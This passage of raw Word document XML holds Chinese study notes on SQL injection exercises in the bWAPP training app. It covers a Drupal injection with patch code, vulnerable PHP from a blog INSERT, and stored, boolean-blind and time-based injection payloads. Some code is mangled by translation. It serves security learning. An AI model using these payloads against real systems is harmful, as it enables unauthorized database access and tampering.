          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这导致可利用的</w:t>
      </w:r>
      <w:r>
        <w:t>SQL查询：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E1384E" w14:textId="17FF9D54" w:rsidR="00A81A91" w:rsidRPr="00CD15B5" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>SELECT * FROM users WHERE name =：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r w:rsidR="00CD15B5">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ，：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> AND status = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553D04C" w14:textId="1CC2E878" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带参数：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = user2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6AEB92" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>Drupal使用PDO，因此允许多查询。所以这个SQL注入可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC1289" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于在数据库中插入任意数据，转储或修改现有数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA723F" w14:textId="18733D33" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或删除整个数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EDD133" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有可能将任意数据插入数据库中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F642D" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以通过带有回调的</w:t>
      </w:r>
      <w:r>
        <w:t>Drupal功能执行任何PHP代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32D33D" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91"/>
    <w:p w14:paraId="4A67B0F8" w14:textId="7C5D0AC6" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补丁：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD0505" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = array（）;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B64C03" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>foreach（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array_values</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">（$ data）as $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =&gt; $ value）{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738ED598" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//这假设没有其他占位符使用相同的占位符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A52580" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>// 名称。例如，如果数组占位符定义为：example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C6DF3" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//并且已经存在：example_2占位符，这将生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32E3F0" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//一个重复的密钥。我们不会将其视为主叫代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F2DCE" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>//如果发生这种情况已经破裂了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146CF37B" w14:textId="77777777" w:rsidR="00A81A91" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [$ key。 '_'。 $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = $ value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797070B4" w14:textId="32C57FA4" w:rsidR="00C83A83" w:rsidRDefault="00A81A91" w:rsidP="00A81A91">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06371890" w14:textId="0AB5EF28" w:rsidR="00242270" w:rsidRDefault="00242270" w:rsidP="00227106"/>
    <w:p w14:paraId="00A496C5" w14:textId="77777777" w:rsidR="00242270" w:rsidRPr="00227106" w:rsidRDefault="00242270" w:rsidP="00227106"/>
    <w:p w14:paraId="2C885E76" w14:textId="34E50E7D" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-存储型(</w:t>
      </w:r>
      <w:r>
        <w:t>Blog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52699538" w14:textId="3BA59F67" w:rsidR="00227106" w:rsidRDefault="005F5D66" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过一番测试，不是很明白这题的意图，只能先看看源代码，然后觉得这应该是insert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>into类型的注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B15E3B" w14:textId="7D7C78AB" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078D5A0" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">        if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_POST["blog"]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1273E" w14:textId="64892C7C" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB3B94" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            $entry = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_POST["entry"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186352E9" w14:textId="08594A6F" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            $owner = $_SESSION["login"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35707AB4" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            if($entry == "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CC519" w14:textId="3C2F944E" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622E6C84" w14:textId="4376B5F7" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                $message =  "&lt;font color=\"red\"&gt;Please enter some text...&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B8994" w14:textId="0FE0F07D" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F9CDE1" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856A9B7" w14:textId="70B2A13F" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402AC341" w14:textId="7ADC4E3E" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC1628" w14:textId="3F715BD2" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = $link-&gt;query($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAC955" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                if(!$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580077D" w14:textId="6F698DC9" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B290D" w14:textId="465CC11F" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    die("Error: " . $link-&gt;error . "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2F8CA7" w14:textId="48FA535C" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A338B94" w14:textId="77777777" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                // Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20016E58" w14:textId="76C6F037" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                // echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6426E1" w14:textId="58DECF63" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">                $message = "&lt;font color=\"green\"&gt;The entry was added to our blog!&lt;/font&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABABD2" w14:textId="2E24E7D6" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587678AE" w14:textId="4D5AC42E" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413E8DA" w14:textId="67C36085" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">        echo "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;" . $message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56122028" w14:textId="2B2E4058" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB">
      <w:r>
        <w:t xml:space="preserve">        ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28672C23" w14:textId="3F81FC9A" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00B538CB"/>
    <w:p w14:paraId="78C4876B" w14:textId="188338EC" w:rsidR="00875EF8" w:rsidRDefault="00492003" w:rsidP="00B538CB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入语句中第三列本来是登录用户名，</w:t>
      </w:r>
      <w:r w:rsidR="00875EF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造语句：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’,(select database()))# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其置换，查询得到如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16590CC0" w14:textId="3D4DF798" w:rsidR="00875EF8" w:rsidRDefault="00875EF8" w:rsidP="00B538CB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73204461" wp14:editId="422C7B46">
            <wp:extent cx="5274310" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="254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4305300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67824CF1" w14:textId="06F9C5A8" w:rsidR="005F5D66" w:rsidRPr="00227106" w:rsidRDefault="00492003" w:rsidP="00B538CB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>……</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看来又得复习一下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51740B67" w14:textId="378E6DF2" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-存储型(</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1CA644" w14:textId="37207747" w:rsidR="00227106" w:rsidRPr="00227106" w:rsidRDefault="00492003" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待续</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6603B" w14:textId="5C23783C" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-存储型(</w:t>
      </w:r>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ser-agent</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8879D" w14:textId="1A7B421D" w:rsidR="00227106" w:rsidRDefault="00492003" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储型的这几道题目都类似。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A41C6B" w14:textId="7A3B9173" w:rsidR="00492003" w:rsidRPr="00227106" w:rsidRDefault="00492003" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A47CF21" wp14:editId="007CE2CC">
            <wp:extent cx="5274310" cy="3220085"/>
            <wp:effectExtent l="0" t="0" r="254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3220085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982B6F8" w14:textId="43076881" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入-存储型(</w:t>
      </w:r>
      <w:r>
        <w:t>XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40E7DF" w14:textId="6C9678F8" w:rsidR="00227106" w:rsidRPr="00227106" w:rsidRDefault="001B6C51" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F271717" w14:textId="1784A50C" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注-</w:t>
      </w:r>
      <w:r w:rsidR="00062E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC7076" w14:textId="54B3935D" w:rsidR="00227106" w:rsidRDefault="001B6C51" w:rsidP="00227106">
      <w:r w:rsidRPr="001B6C51">
        <w:t>Iron Man ' and (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>((select version()),1,1)=</w:t>
      </w:r>
      <w:r w:rsidR="00FC0C36">
        <w:t>97</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6C51">
        <w:t>) --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08293307" w14:textId="4BBBC90D" w:rsidR="00FC0C36" w:rsidRPr="00FC0C36" w:rsidRDefault="00FC0C36" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断数据库第一个字母是不是b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5529D" w14:textId="16333410" w:rsidR="00E7491F" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注-基于时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45611172" w14:textId="32B19236" w:rsidR="00227106" w:rsidRPr="001B6C51" w:rsidRDefault="001B6C51" w:rsidP="00227106">
      <w:r w:rsidRPr="001B6C51">
        <w:t>Iron Man' and (if((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>((select version()),1,1)=</w:t>
      </w:r>
      <w:r w:rsidR="00FC0C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6C51">
        <w:t>),sleep(5),null)) --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBB2B4" w14:textId="3FEF6708" w:rsidR="00D712AD" w:rsidRDefault="00D712AD" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50799E" w14:textId="69EC070D" w:rsidR="00D712AD" w:rsidRDefault="00D712AD" w:rsidP="00227106">
      <w:r w:rsidRPr="00D712AD">
        <w:t>http://blog.51cto.com/dearch/1950456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED765F3" w14:textId="47C36234" w:rsidR="003C3C63" w:rsidRDefault="003C3C63" w:rsidP="00227106">
      <w:r w:rsidRPr="003C3C63">
        <w:t>https://98587329.github.io/2018/04/19/bwapp-%E5%AD%A6%E4%B9%A0/#SQL-Injection-Stored-Blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B2E9F" w14:textId="77777777" w:rsidR="003C3C63" w:rsidRPr="003C3C63" w:rsidRDefault="003C3C63" w:rsidP="00227106"/>
    <w:p w14:paraId="69E395FA" w14:textId="37E70EC4" w:rsidR="00062E5B" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>盲注</w:t>
      </w:r>
      <w:r>
        <w:t>(SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E5291" w14:textId="77777777" w:rsidR="00227106" w:rsidRPr="00227106" w:rsidRDefault="00227106" w:rsidP="00227106"/>
    <w:p w14:paraId="21F3A7D2" w14:textId="2A224497" w:rsidR="00E7491F" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注(</w:t>
      </w:r>
      <w:r>
        <w:t>web service/SOAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE2C5E" w14:textId="5DEFB4A1" w:rsidR="00227106" w:rsidRDefault="001B6C51" w:rsidP="00227106">
      <w:r w:rsidRPr="001B6C51">
        <w:t>Iron Man ' and (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B6C51">
        <w:t>((select version()),1,1)=</w:t>
      </w:r>
      <w:r w:rsidR="00FC0C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6C51">
        <w:t>) --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849BD25" w14:textId="4FEA2030" w:rsidR="001B6C51" w:rsidRDefault="001B6C51" w:rsidP="00227106"/>
    <w:p w14:paraId="63E1B2EB" w14:textId="77777777" w:rsidR="001B6C51" w:rsidRPr="001B6C51" w:rsidRDefault="001B6C51" w:rsidP="00227106"/>
    <w:p w14:paraId="774A1DD0" w14:textId="7F7E1496" w:rsidR="000979A5" w:rsidRDefault="000979A5" w:rsidP="000979A5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00062E5B">
